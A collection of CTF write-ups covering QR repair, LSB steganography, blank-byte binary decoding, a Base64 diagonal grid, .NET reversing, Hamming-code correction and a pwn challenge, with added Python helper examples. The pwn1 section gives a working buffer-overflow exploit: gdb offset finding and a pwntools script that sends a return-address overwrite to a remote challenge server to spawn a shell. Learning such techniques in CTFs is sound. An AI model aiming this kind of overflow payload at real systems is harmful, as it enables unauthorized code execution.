RADARCTF - QRadar(Misc 400)
I found the broken(?) QR code, but it can't be read by my iPhone.
Maybe it should be repaired.
http://qr.biz/articles/the_structure_of_qr_code/
I referred to the structure of the QR code, and I think:
-> The Timing patterns and Alignment patterns are correct.
-> About the Version information and Format information, I can't understand them well...
-> So I guess only the Position patterns are missing.
I should prepare an image of the Position patterns which matches this QR code.
I used this site.
https://www.cman.jp/QRcode/qr_option/version/
By using this site, I can prepare a sample QR code which follows the standard for each version.
I think "Version 11 (61 cells x 61 cells)" is the most suitable for this QR code.
So I copied the Position patterns image from the QR code made at the above site,
and pasted it onto the original image.
The QR code was read successfully, and I got the flag.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxradar{qr_fixing_i5_v3ry_aw3s0me}xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
flag is: radar{qr_fixing_i5_v3ry_aw3s0me}
Maybe there is a more stylish solution, but I didn't have enough time to think of it :P
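The paste step can also be done on a module grid instead of in an image editor. The following Python is an added example (not code from this write-up or from cman.jp): it takes a square grid of 0/1 modules (1 = dark), derives the version from the side length (61 modules -> version 11, since side = 17 + 4 x version), and overwrites the three Position (finder) patterns plus their one-module light separators in the top-left, top-right and bottom-left corners. The 0/1 grid convention and the blank 61x61 sample are assumptions made for the demo; reading the modules out of the challenge PNG is left to whatever image library you use.

```python
# Added example (not from the write-up): rebuild the three Position (finder)
# patterns of a QR symbol for a given version and stamp them onto a module grid.
# Grid convention assumed here: list of rows, 1 = dark module, 0 = light module.

FINDER = [
    "1111111",
    "1000001",
    "1011101",
    "1011101",
    "1011101",
    "1000001",
    "1111111",
]


def qr_size(version):
    """Side length in modules for QR versions 1..40 (21 for v1, +4 per version)."""
    if not 1 <= version <= 40:
        raise ValueError("version must be 1..40")
    return 17 + 4 * version


def qr_version_from_size(size):
    """Inverse of qr_size; rejects side lengths that no QR version has."""
    version, rem = divmod(size - 17, 4)
    if rem or not 1 <= version <= 40:
        raise ValueError("%d modules is not a valid QR size" % size)
    return version


def finder_overlay(size):
    """Modules owned by the three finders and their light separators.

    Returns {(row, col): 1|0}.  Each 7x7 finder sits in an 8x8 block whose
    extra row/column is the separator: top-left, top-right, bottom-left.
    """
    overlay = {}
    # (block corner, finder offset inside the block)
    blocks = [((0, 0), (0, 0)), ((0, size - 8), (0, 1)), ((size - 8, 0), (1, 0))]
    for (r0, c0), (fr, fc) in blocks:
        for dr in range(8):
            for dc in range(8):
                overlay[(r0 + dr, c0 + dc)] = 0      # separator unless overwritten
        for dr in range(7):
            for dc in range(7):
                overlay[(r0 + fr + dr, c0 + fc + dc)] = int(FINDER[dr][dc])
    return overlay


def repair_finders(grid):
    """Return (fixed_grid, version) with the finder areas overwritten."""
    size = len(grid)
    if any(len(row) != size for row in grid):
        raise ValueError("module grid must be square")
    version = qr_version_from_size(size)
    fixed = [list(row) for row in grid]
    for (r, c), module in finder_overlay(size).items():
        fixed[r][c] = module
    return fixed, version


def render(grid):
    """ASCII dump for eyeballing: '##' dark, '  ' light."""
    return "\n".join("".join("##" if m else "  " for m in row) for row in grid)


if __name__ == "__main__":
    # Constructed stand-in for the challenge image: a 61x61 (version 11) grid
    # with every module light, i.e. the finders are missing.
    blank = [[0] * 61 for _ in range(61)]
    fixed, version = repair_finders(blank)
    print("version", version)
    print(render(fixed))
```

It leaves the Timing, Alignment, Format and Version areas untouched, which matches the diagnosis above; if the finders were not the only damage, a reader would still fail and the overlay would have to be extended the same way.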
RADARCTF - Black(Misc 200)
The attached image is just black...
I used Stegsolve.jar to analyze it.
So I found the flag image in the lower bit of each color byte.
flag is: radar{reverse_color_give_flag}
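What "the lower bit of each color byte" means in code, as an added example (not the author's Stegsolve session): it extracts one bit plane from raw RGB bytes, reports whether the image looks black, and prints the plane normally or with the colors reversed. The 8x8 sample image, its shape and the 3-bytes-per-pixel layout are constructed for the demo; for a real file you would get the same bytes with Pillow via Image.open(path).convert("RGB").tobytes() and the size from im.size.

```python
# Added example (not the write-up's tooling): pull one bit plane out of raw
# RGB pixel bytes, the same view Stegsolve shows as "Red plane 0" and so on.
# Assumed layout: row-major, 3 bytes per pixel (R, G, B), no alpha.

def bit_plane(pixels, width, height, channel, bit):
    """Return `height` rows of `width` 0/1 values: bit `bit` of channel `channel`."""
    if len(pixels) != width * height * 3:
        raise ValueError("pixel buffer does not match %dx%d RGB" % (width, height))
    if channel not in (0, 1, 2) or not 0 <= bit <= 7:
        raise ValueError("channel must be 0..2 and bit 0..7")
    plane = []
    for y in range(height):
        row = []
        for x in range(width):
            value = pixels[(y * width + x) * 3 + channel]
            row.append((value >> bit) & 1)
        plane.append(row)
    return plane


def looks_black(pixels, threshold=8):
    """True when no channel value exceeds `threshold`: the image is visually black."""
    return max(pixels) <= threshold


def render(plane, invert=False):
    """'#' for set bits; invert=True gives the 'reverse color' view."""
    return "\n".join(
        "".join("#" if (b ^ invert) else "." for b in row) for row in plane
    )


# Constructed sample: an 8x8 all-black image whose red LSB carries a shape.
SHAPE = [
    "01111110",
    "10000001",
    "10100101",
    "10000001",
    "10111101",
    "10000001",
    "10000001",
    "01111110",
]


def make_sample():
    buf = bytearray()
    for row in SHAPE:
        for ch in row:
            buf += bytes([int(ch), 0, 0])   # R = 0 or 1, G = B = 0: still black
    return bytes(buf)


if __name__ == "__main__":
    img = make_sample()
    print("looks black:", looks_black(img))
    for bit in (7, 0):
        print("red plane", bit)
        print(render(bit_plane(img, 8, 8, 0, bit)))
```

Plane 7 is empty and plane 0 shows the shape, which is exactly the difference between what the eye sees and what Stegsolve finds.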
RADARCTF - Blanks(Crypto 300)
Opening flag.txt with a text editor, it seems to be written only with blanks.
Opening flag.txt with a binary editor (I like Stirling),
there are two character-code patterns: 0x20 and 0x90.
So I replaced the character codes as follows.
0x20 -> 0x31(1)
0x90 -> 0x30(0)
Opening the replaced file with a text editor:
011100100110000101100100011000010111001001111011011000100110110001100001011011100110101101110011010111110110001001110101011101000101111101101110011011110111010001011111011000100110110001100001011011100110101101111010011111
I can decode it into ASCII characters.
flag is: radar{blanks_but_not_blankz}
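The replace-and-read step as an added Python example (not the author's editor work). It maps the two byte values to bits, packs them into ASCII, and tries both polarities in case 0x20 is really the 0 and 0x90 the 1; the wrong polarity sets the high bit of every byte and fails the ASCII decode, so only the right one survives. The sample input is built by an inverse mapper from a made-up string, not from the real flag.txt.

```python
# Added example (not the write-up's manual editing): turn the two-byte
# "blank" alphabet back into bits and then ASCII, trying both polarities.

def blanks_to_bits(data, one, zero):
    """Map each byte to '1'/'0'; any other byte value is an error."""
    bits = []
    for b in data:
        if b == one:
            bits.append("1")
        elif b == zero:
            bits.append("0")
        else:
            raise ValueError("unexpected byte 0x%02x" % b)
    return "".join(bits)


def bits_to_text(bits):
    """Pack 8 bits per character; the bit count must be a multiple of 8."""
    if len(bits) % 8:
        raise ValueError("%d bits is not a whole number of bytes" % len(bits))
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return raw.decode("ascii")


def decode_blanks(data):
    """Try both (one, zero) assignments; keep those that give printable ASCII."""
    symbols = sorted(set(data))
    if len(symbols) != 2:
        raise ValueError("expected exactly two distinct byte values, got %r" % symbols)
    a, b = symbols
    candidates = []
    for one, zero in ((a, b), (b, a)):
        try:
            text = bits_to_text(blanks_to_bits(data, one, zero))
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            candidates.append((one, zero, text))
    if not candidates:
        raise ValueError("neither polarity yields printable ASCII")
    return candidates


def encode_blanks(text, one=0x20, zero=0x90):
    """Constructed test-vector builder: the inverse of the mapping in the text."""
    out = bytearray()
    for byte in text.encode("ascii"):
        for i in range(7, -1, -1):
            out.append(one if (byte >> i) & 1 else zero)
    return bytes(out)


if __name__ == "__main__":
    sample = encode_blanks("radar{sample}")      # constructed, not the real flag.txt
    for one, zero, text in decode_blanks(sample):
        print("0x%02x -> 1, 0x%02x -> 0: %s" % (one, zero, text))
```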
RADARCTF - Chars(Crypto 100)
cRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RmRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRFRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRkRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRYRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRXRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRJRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRR7RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRYRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRR2RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRcRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRR9RRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRZRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRnRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRcRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRR9RRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRjRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRaRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRGRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRFRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRyRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRXRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRR2RRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRdRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRpRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRdRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRmRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRVRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRfRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRZRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRmRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRxRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRhRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRZRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR3R
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR0
Collecting the diagonal characters from top-left to bottom-right:
->cmFkYXJ7Y2hhcl9hZnRlcl9jaGFyX2dpdmVfZmxhZ30
It looks like a Base64-encoded string.
Adding '=' to the end of the above string for padding, and decoding it.
flag is: radar{char_after_char_give_flag}
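The diagonal-plus-padding step as an added example (not the author's manual collection). main_diagonal reads position (i, i) from each row, so a diagonal character that happens to equal the filler is still picked up (the 19th row above is all R because the Base64 character there is itself an R); b64decode_unpadded restores the '=' padding from the length and rejects lengths that can never be Base64. The grid in the demo is constructed from a made-up secret; pasting the 43 rows above into rows gives the flag string.

```python
# Added example (not the write-up's manual work): read the main diagonal of a
# character grid and Base64-decode it, restoring the padding the grid dropped.
import base64


def main_diagonal(rows):
    """Characters at (i, i) for i in 0..len(rows)-1."""
    out = []
    for i, row in enumerate(rows):
        if len(row) <= i:
            raise ValueError("row %d is too short for the diagonal" % i)
        out.append(row[i])
    return "".join(out)


def b64decode_unpadded(s):
    """Base64 with the trailing '=' stripped: pad to a multiple of 4 first."""
    s = s.strip()
    if len(s) % 4 == 1:
        raise ValueError("length %d mod 4 == 1 can never be valid Base64" % len(s))
    return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)


def build_grid(secret, filler="R"):
    """Constructed challenge-style grid: Base64 of secret (no '=') on the diagonal."""
    diag = base64.b64encode(secret.encode()).decode().rstrip("=")
    n = len(diag)
    return [filler * i + ch + filler * (n - 1 - i) for i, ch in enumerate(diag)]


def solve(rows):
    return b64decode_unpadded(main_diagonal(rows)).decode()


if __name__ == "__main__":
    grid = build_grid("radar{example}")   # constructed, not the challenge file
    print("\n".join(grid))
    print(main_diagonal(grid))
    print(solve(grid))
```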
RADARCTF - EasyReverse(RE 80)
The attached file is a .NET executable.
So I analyzed this file using dnSpy.
I found the "flag()" function.
It builds two strings in the flag format.
radar{flagino_flago_flago}
radar{flaginoflago}
I tried to submit both of them, and the first one is the flag.
flag is: radar{flagino_flago_flago}
ENCRYPT CTF 2019 - ham-me-baby(Misc 75)
Maybe the problem was replaced: ham-me-baby -> ham-me-baby2
Even when I run the ham-me-baby script, the result is an error.
Maybe sometimes the CODE sent from the server is wrong.
So I should detect that, and it is necessary to submit the DATA corrected by the Hamming code.
To understand it, I should read the following wiki.
I defined the 7 bits given by CODE as follows.
P1 P2 D1 P3 D2 D3 D4
P: Parity bit / D: Data bit
And I made the judgement syntax by referring to this site.
http://www.kmiura.net/archives/4662487.html
D1 XOR D3 XOR D4 XOR P1 = 0 //Syntax1
D1 XOR D2 XOR D4 XOR P2 = 0 //Syntax2
D1 XOR D2 XOR D3 XOR P3 = 0 //Syntax3
If all Syntaxes are 1 -> D1 is wrong.
If only Syntax1 is 0 and the others are 1 -> D2 is wrong.
If only Syntax2 is 0 and the others are 1 -> D3 is wrong.
If only Syntax3 is 0 and the others are 1 -> D4 is wrong.
I rewrote the script according to the above logic.
Curiously, the logic is correct, but the script's result is still an error...
So I think that the data sequence of CODE is different from what I expected.
I changed the handling of the bits of CODE as follows.
P1 P2 D4 P3 D3 D2 D1 -> reverse the sequence of the Data bits.
That was correct for this challenge.
The script is the following.
# Python 3
import socket

HOST, PORT = '104.154.106.182', 6969


def humming_validate(code):
    # Bit layout of CODE (index 0..6): P1 P2 D4 P3 D3 D2 D1
    p1, p2, d4, p3, d3, d2, d1 = (int(c) for c in code)
    code_result = code
    # Syntax1..3 from the text: each is 0 when its parity check passes
    result1 = d1 ^ d3 ^ d4 ^ p1
    result2 = d1 ^ d2 ^ d4 ^ p2
    result3 = d1 ^ d2 ^ d3 ^ p3
    # (Syntax1, Syntax2, Syntax3) -> index of the wrong data bit in CODE
    errors = {
        (1, 1, 1): (6, 'd1'),
        (0, 1, 1): (5, 'd2'),
        (1, 0, 1): (4, 'd3'),
        (1, 1, 0): (2, 'd4'),
    }
    hit = errors.get((result1, result2, result3))
    if hit is not None:
        idx, name = hit
        print(name + ' is error')
        rep = '1' if code[idx] == '0' else '0'   # flip the wrong bit
        code_result = code[:idx] + rep + code[idx + 1:]
    return code_result


def recvuntil(s, tail):
    tail = tail.encode()
    data = b''
    while tail not in data:
        chunk = s.recv(1)
        if not chunk:
            raise EOFError('connection closed before %r' % tail)
        data += chunk
    return data.decode()


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
data = recvuntil(s, 'bits.\n').strip()
print(data)
data = recvuntil(s, '\n').strip()
print(data)
for i in range(100):
    data = recvuntil(s, '\n').strip()
    print(data)
    if data == 'CODE VALIDATED':
        print('Round %d' % (i + 1))
        data = recvuntil(s, '\n').strip()
        print(data)
        code = data.split(': ')[1]
        code_result = humming_validate(code)
        d = code_result[2] + code_result[-3:]   # D4 D3 D2 D1: the four data bits in CODE order
        data = recvuntil(s, ': ')
        print(data + d)
        s.sendall((d + '\n').encode())
        data = recvuntil(s, '\n').strip()
        print(data)
        data = recvuntil(s, '\n').strip()
        print(data)
So I got the flag.
flag is: encryptCTF{1t_w4s_h4rd3r_th4n_1_th0ught}
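The three checks in the text are the standard Hamming(7,4) checks once the seven received bits are numbered 1..7 from the left: check 1 covers positions 1,3,5,7, check 2 covers 2,3,6,7, check 3 covers 4,5,6,7, and the failing checks read as a binary number (check 3 as the high bit) give the position of the single wrong bit. With CODE laid out P1 P2 D4 P3 D3 D2 D1 that reproduces the table above: all three fail -> position 7 (D1), only Syntax1 passes -> 6 (D2), only Syntax2 passes -> 5 (D3), only Syntax3 passes -> 3 (D4). The following is an added example, not the author's script: it encodes, locates and corrects an error at any of the seven positions, parity bits included, and extracts positions 3,5,6,7 in order, which is what the script above sends as code_result[2] + code_result[-3:]. The sample codeword is constructed, not a CODE captured from the server.

```python
# Added example (not the write-up's script): the standard Hamming(7,4) view of
# the three checks in the text.  Positions are 1-based, left to right.
CHECKS = ((1, 3, 5, 7), (2, 3, 6, 7), (4, 5, 6, 7))
DATA_POSITIONS = (3, 5, 6, 7)


def hamming74_encode(data):
    """4 data bits (string) -> 7-bit codeword with data at positions 3,5,6,7."""
    if len(data) != 4 or set(data) - {"0", "1"}:
        raise ValueError("data must be four '0'/'1' characters")
    bits = [0] * 8                               # index = position, 0 unused
    for pos, ch in zip(DATA_POSITIONS, data):
        bits[pos] = int(ch)
    for parity_pos, covered in zip((1, 2, 4), CHECKS):
        bits[parity_pos] = sum(bits[p] for p in covered if p != parity_pos) & 1
    return "".join(str(b) for b in bits[1:])


def hamming74_syndrome(code):
    """0 when every check passes, else the 1-based position of the bad bit."""
    if len(code) != 7 or set(code) - {"0", "1"}:
        raise ValueError("code must be seven '0'/'1' characters")
    bits = [0] + [int(c) for c in code]
    syndrome = 0
    for weight, covered in zip((1, 2, 4), CHECKS):
        if sum(bits[p] for p in covered) & 1:    # check fails -> add its weight
            syndrome |= weight
    return syndrome


def hamming74_correct(code):
    """Return (corrected codeword, position flipped); position 0 means no error."""
    pos = hamming74_syndrome(code)
    if pos == 0:
        return code, 0
    idx = pos - 1
    flipped = "0" if code[idx] == "1" else "1"
    return code[:idx] + flipped + code[idx + 1:], pos


def hamming74_data(code):
    """Data bits of a (possibly single-bit-corrupted) codeword, in position order."""
    fixed, _ = hamming74_correct(code)
    return "".join(fixed[p - 1] for p in DATA_POSITIONS)


if __name__ == "__main__":
    word = hamming74_encode("1011")               # constructed sample, not a server CODE
    print("codeword", word)
    for pos in range(1, 8):
        i = pos - 1
        damaged = word[:i] + ("0" if word[i] == "1" else "1") + word[i + 1:]
        fixed, found = hamming74_correct(damaged)
        print("flip %d -> %s, syndrome %d, data %s"
              % (pos, damaged, found, hamming74_data(damaged)))
```

Unlike the script above, a flipped parity bit is also reported (syndrome 1, 2 or 4); the data bits are untouched in that case, which is why the script could ignore it and still pass. Two flipped bits are outside what this code can detect and will be "corrected" to the wrong codeword.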
ENCRYPT CTF 2019 - pwn1(Pwn 50)
First of all, I decompiled it using GHIDRA!!
- The main() function has a BoF vulnerability (there is no length check, and it uses gets/puts).
- The shell() function calls "/bin/sh".
So the tactic is to overwrite the return address with the address of shell() -> 0x80484b3
Step 1: Identify the position of the return address.
-> Execute pwn1 in gdb, and input the following string.
Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
-> A segmentation fault occurred at 0x36373537.
That means the return address comes after 140 characters of padding.
Step 2: Write the script to win.
The following is my script.
# coding:utf-8
from pwn import remote, p32

host = "104.154.106.182"
port = 2345

r = remote(host, port)
r.recvuntil(b"Tell me your name: ")
code = b"A" * 140          # padding up to the saved return address
code += p32(0x80484b3)     # address of shell(), little-endian
print(code)
r.sendline(code)
r.interactive()
I got the following result.
flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}
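Step 1 can be checked offline rather than read off the gdb output by hand. The crash value 0x36373537 is the four pattern bytes that landed in EIP, stored little-endian, so unpacking it with "<I" gives the substring to search for in the input. The following is an added example, not the author's script: it rebuilds the decimal counter string typed above, finds every offset where those bytes occur (the counter pattern is not guaranteed to have unique 4-byte windows, unlike pwntools' cyclic()/cyclic_find(), so all matches are returned and the caller checks there is exactly one), builds the padding-plus-address payload, and confirms it contains no newline, since gets() would stop reading there.

```python
# Added example (not the write-up's script): locate the saved return address
# from the faulting EIP value, then build and sanity-check the payload.
import struct


def counter_pattern(n=100):
    """'0123456789101112...' as typed in Step 1: str(i) for i in range(n)."""
    return "".join(str(i) for i in range(n)).encode()


def find_offsets(pattern, fault_addr):
    """All offsets where the 4 bytes that reached EIP occur in pattern."""
    needle = struct.pack("<I", fault_addr)       # 0x36373537 -> b"7576"
    hits, start = [], 0
    while True:
        i = pattern.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def build_payload(offset, ret_addr):
    """Padding up to the saved return address, then ret_addr little-endian."""
    return b"A" * offset + struct.pack("<I", ret_addr)


def gets_safe(payload):
    """gets() stops at '\\n', so the payload must not contain one."""
    return b"\n" not in payload


if __name__ == "__main__":
    pat = counter_pattern()
    offsets = find_offsets(pat, 0x36373537)
    print("EIP bytes:", struct.pack("<I", 0x36373537), "offsets:", offsets)
    if len(offsets) != 1:
        raise SystemExit("ambiguous or missing match: %r" % offsets)
    payload = build_payload(offsets[0], 0x80484B3)     # shell() address from the write-up
    print("payload length %d, gets-safe: %s" % (len(payload), gets_safe(payload)))
```

For this input the only match is 140, which is the padding length the script above uses; the final check matters because an address containing 0x0a (such as one ending in ...0a) could never be delivered through gets().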
This is the first time I got a PWN flag since joining my team.
Congrats to me ^^